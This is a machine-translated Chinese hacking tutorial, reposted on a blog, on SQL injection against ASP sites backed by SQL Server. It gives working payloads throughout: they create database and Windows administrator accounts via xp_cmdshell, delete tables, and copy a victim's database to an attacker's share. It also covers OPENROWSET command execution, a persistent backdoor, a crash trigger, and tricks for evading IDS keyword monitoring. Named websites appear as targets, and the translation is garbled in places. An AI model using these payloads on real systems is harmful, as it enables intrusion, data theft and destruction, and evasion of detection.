SQL database attack detailed

xiaoxiao2021-03-06  87

For many news, BBS and e-commerce websites use ASP SQL design, and many programmers who write ASP (there are many new graduation), so ASP SQL's attack success rate is also relatively high. This type of attack method and NT version and SQL version have no big relationship, and there is no corresponding patch because the vulnerability is caused by the programmer, and most of the books of the ASP programming, the source code example has this vulnerability In fact, only some legal ASP requests for SQL, leave after the suffering!

This attack method originated from the vulnerability of 'or'1' = '1 (we call it as a vulnerability), the principle of this vulnerability I think everyone should know, then, then the same; execSp_addlogin HAX (Add a HAX user in the database), but this method is limited, first ASP uses the SQL Server account is an administrator, followed by the submission variable in the entire SQL statement, because some programmers use Select * from FROM News where id = ... and Topic = ... and ..... This method requests the database, then if you still use the above example, you will be news.asp? id = 2; exec sp_addlogin Hax becomes Select * from News where id = 2; exec sp_addlogin hax and topic = ... and ... The entire SQL statement has an AND and judgment existence after executing sp_addlogin stored procedures, syntax errors, your sp_addlogin naturally does not run normally, so try Try Now this method: news.asp? Id = 2; exec sp_addlogin Hax; - Back - Symbol The judgment statement after sp_addlogin turns a comment, so there is no syntax error, sp_addlogin is executed normally! So let's use the news.asp? Id = 2; exec master.dbo.sp_addlogin hax; - news.asp? Id = 2; exec master.dbo.sp_password null, Hax, Hax; - News.asp ? id = 2; exec master.dbo.sp_addsrvrolemember sysadmin Hax; - news.asp? id = 2; exec master.dbo.xp_cmdshell 'net user Hax / Workstations: * / Times: all / passwordchg: Yes / PasswordReq: YES / ACTIVE: YES / Add '; - news.asp? id = 2; exec master.dbo.xp_cmdshell' net localgroup administrators Hax / add '; - this left HAX in his database and system The administrator account is, of course, the prerequisite is the ASP manager account, so don't try this vulnerability. We will discuss later, if the other party's ASP does not use the SQL administrator account, how we invaded, of course, will also involve the invasion of the 1433 port. Of course, everyone can try to add a 'symbol after ID = 2, mainly watching each other How to write ASP. Let's talk about how we do when the SQL account used by the ASP program is not administrator.

You are as the homepage of Heaven, there is news content, as follows: http://www.talent.com.cn/news/news-2.asp?newid=117 you can try to see http://www.talentitit.com .cn / news / news-2.asp? newid = 117; select 123; - Oh, report syntax error, SELECT 123 error, obvious, Tianle new ASP ends with the 'number after the NewID variable, then try to see http : //www.talentitit.com.cn/news/news-2.asp? newid = 117 '; delete news; - haha, I think as long as the name is guess, the news base is deleted. Usually the SQL account for ASP is not an administrator or an Owner of a database, at least for this library has high management privileges. But we don't know how the library is? Take a look at the db_name () function. Open your query analyzer to see print db_name (), huh, huh, the current database name is coming out. Push as the subkey, as follows: declare @a sysname; set @ a = db_name (); backup database @a to disk = 'your ip Your shared directory Bak.dat', name = 'test'; - Oh, he The current database is backed up to your hard drive, you will understand it in your heart. Similarly, this method can find the other's SQL IP, first install a firewall, open ICMP and 139TCP and 445TCP warning tips, then try to see news.Aasp? Id = 2; exec master.dbo.xp_cmdshell 'ping your IP, If the firewall prompts someone ping you, then it can be sure the other ASP is SQL administrator privilege, and it also determines the exact location of the other SQL Server, because many of the big websites consider performance, WEB services and The database is separated, and when the other party does not see the source code, I think there is only this method to locate the position of the other SQL Server.

So, if the other ASP does not have SQL administrator privileges, we can't call XP_cmdshell, what should I do? Don't worry, try this news.asp? Id = 2; declare @a; set @ a = db_name (); backup database @a to disk = 'your IP Your shared directory Bak.dat', Name = 'TEST '; - huh, your firewall should make a warning, some people connect your 445 or 139 (Win9 port, so that the other's SQL IP can also be exposed. So if the other party even the Owner of the other database is not What should we do? Next time I will tell you a better way. In fact, Backuo Database to your hard drive is still a bit exaggerated. If the other database is very large, you are dial-up, huh, huh, huh, advise you don't try, It is difficult to successfully transfer. Next time we will talk about how to deceive IDS to execute the ASP SQL invasion. There are some good IDs that have begun to monitor the keywords of XP_cmdshell, well, comrades next time! All the above URLs hope everyone Submit by VBScript, because the address bar of the browser will block some special characters so your command cannot be fully transmitted with the Window.Location.herf = URL supplement: This issue has been raised on the Internet, but it is just some simple XP_cmdshell The call limit is limited. In fact, there are many things worth in-depth, such as www.guosen.com.cn. Guoxin CPP has this problem, and they use the MS three-story structure to use the XP_cmdshell practice to do. The string will be filtered, but I tried it, I can still open the Telnet service and the account of the Telnet service and the Administrators group on the other's machine! Since the other firewall is very checkerpoint data reported, only open the 80-port, therefore, If you want to get his database structure, it is still a way to do it: p. By the way remind everyone to pay attention to SQLOLEDB, DB_NAME, OpenRowSet, OpenDataSource These system functions When ASP's SQL Server account is just a normal user, they Will be useful! SQL Server new vulnerabilities and some breakthroughs I have to talk about some SQL Server new bugs, although I have been working hard, of course, I have a little lucky component, I can find it, I don't dare to enjoy alone. I will take it out, please identify, of course, some masters have long been known, after all, I have exposed to SQL Server for less than 1 year: P 1. About OpenrowSet and OpenDataSource may have already a skill, that is, using OpenRowSet Command usually our usage is (including MSDN's List) as follows Select * from openrowset ('sqloledb', 'myserver'; 'sa'; ',' SELECT * from Table ')

It can be seen (even from the literal sense) Openrowset is just as a fast remote database access, it must be followed behind Select, that is, what we need to return to a recordset, can we use it to call XP_cmdshell? The answer is yes!

Select * from openrowset ('sqloledb', 'server'; 'sa'; '', 'set fmtonly off exec master.dbo.xp_cmdshell' 'DIR C: /' ') must be added to SET FMTONLY OFF to block the default Only return to the settings of the column information, so the output collection returned by XP_cmdshell will be submitted to the front Select display. If the default setting is used, the empty set will return the select error, and the command will not be executed. Then if we want to call sp_addlogin, he will not return any collection like XP_cmdshell, we can't rely on FMTONLY, you can do the SELECT * from OpenRowSet ('SQLOLEDB', 'Server'; 'SA', '', 'select' 'OK!' 'exec master.dbo.sp_addlogin hectic'), so that the command will return to the collection of select 'ok!', your machine chamber shows OK!, the other party's database will also add a hectic The account, that is, we use Select 'OK!' To deceive the local SELECT request, which is the command to be executed normally, the cleaning sp_addsrvroleMember and OpenDataSource can also do this! Until

This method is really useful, everyone slowly thinks: P 2. Regarding the question of MSDasql twice, I don't know if you have tried the MSDasql to connect the remote database. Of course, this API must be an administrator of SQLServer to call, so as follows

Select * from OpenRowSet ('msdasql', 'driver =; server = server; address = server, 1433; uid = sa; pwd =; database = master; network = dbmssocn', 'select * from table1 select * frOle2')

When the number of the fields of table1 and table2 is not the same, you will find that the other's SQL Server crashes, and even the local connection will fail, and the system resource is occupied. After killing the SQLServer process with pskill, if the machine is not restarted, SQLServer is not normal. Start, either often appear illegal operation, I just happened to find this bug, I haven't touched the specific reason, and it is very strange that this phenomenon only appears on MSDasql, SQLOLDB does not have this problem, it seems that the problem is not requested The number of collections and the number of returns do not match, because it is the problem of MSDasql itself, the specific reason, everyone slowly studies: P 3. The terrible back door has seen someone on the Internet. Some people say that after SQL Server can do it by adding Triger, Jobs, or rewriting sp_addlogin and sp_addsrvroleMember, these methods are of course feasible, but it is easy to be discovered. I don't know if you have thought about the local connection map of SQLOLOLDB. Oh, if you perform the following command * from openrowset ('sqloledb', 'trusted_connection = yes; data source = hectic', 'set fmtonly off exec master..xp_cmdshell' Dir c: / '' ') This map is established on the other's SQL Server, as long as SQLServer does not restart, this map will always exist, at least I still don't know how to find the connection mapped by others. Ok, after the above command runs, you will find that even if SQL Server doesn't have any permissions, you can run the same as you can pass! And the permissions are Localsystem! (Default installation) huh! This method can be used to leave a back door with SQL Server that has been invaded by administrator privileges. The above method passes on SQL Server2000 SQLServer 200SP1! * There is another guess. I don't know if you haven't pay more attention to the two DSNs included with Windows. One is the LocalServer one is MSQi. These two are the local administrator account connection SQLServer, if the other party's SQL Server is By starting with custom Power User, then the permissions of SA are the same as Power User, it is difficult to make a big, but we pass select * from openrowset ('msdasql', 'dsn = locaserver; trusted_connection = yes', 'set fmtonly off eXec master..xp_cmdshell' 'Dir C: /' ') You can use localServer's administrator account to connect to local SQLServer and then perform local commands with this account permission. This is, I think it should be able to break through. The SA is Power User permission. The current problem is that SQLOLEDB cannot call the DSN connection, and the MSDasql non-administrator does not let the call, so I am looking for guest calls MSDasql method If someone knows how this bug broke through, or there is a new idea, we can discuss it together, this Distribution If you can successfully be utilized by Guest, it will be a very serious security vulnerability.

Because any SQL statement mentioned earlier can be submitted to the other party's ASP to help us execute: p) Use T-SQL to scam IDS or attack IDS now IDS has become more and smarter. Ids added. XP_cmdshell sp_addlogin monitors, but after all, artificial intelligence has not appeared today, this surveillance always has a feeling of deceiving. Let me talk about deception IDS: IDS Since we monitor the xp_cmdshell keyword, then we can do this, declare @a sysname set @ a = "xp _" "cmdshell" EXEC @a 'Dir C: /' This code is like everyone can Look, there is XP_cmdshell as a Store Procedure there is a ID number in the Master library, fixed, we can also do this, assume this id = 988456 declare @a sysname select @ a = Name from sysobjects where id = 988456 exec @ A 'DIR C: /' Of course, you can also declare @a sysname select @ a = name from sysobjects where id = 988455 1 exec @a 'DIR C: /' This practice is arranged, IDS is not possible to do it completely Surveillance is the same, sp_addlogin can also do this. Let's talk about the attack IDS: Because the IDS data is large, you can always back up to the regular database, such as SQL Server If you use an old RecordSet.AddNew practice, you will seriously affect the performance of IDS, because T-SQL requests are made through ADO, not only efficiency High, and some work can be handed over to SQL Server. Usually the program will write this: INSERT TABLE VALUES ('Day to Content', ...) So I think, if you use Temp ') Exec XP_cmdshell' Dir C: / '-, it will turn into Insert Table after submission. VALUES ('Day to Content' .... 'Temp') Exec Xp_cmdshell 'DIR C: /' - '), this, XP_cmdshell can run in the IDS database, of course Ids is a sniper, he will Care all the reports, and the browser will turn the space into% 20, so% 20 will be submitted to SQL Server so your command cannot be executed, the only way is INSERT / ** / TABLE / ** / values ​​('Day to content' .... 'Temp') / ** / exec / ** / xp_cmdshell / ** / 'DIR C: /' / ** / - ') / ** / Instead of the space to do spacers, so your T-SQL can execute within the IDS database, of course, you can also use other statements, you can destroy, back up the IDS database to your shared directory. Oh ... In fact, the principle of this method is the same, just turning the space into / ** /, the ASP is a SELECT statement, then "can block the Ids Now Ids use the INSERT statement, then ') shield. Ok, many other new invasive statements can slowly think, the best test tool is Query Analyzer.

Source: Net People Empire

转载请注明原文地址:https://www.9cbs.com/read-106340.html

New Post(0)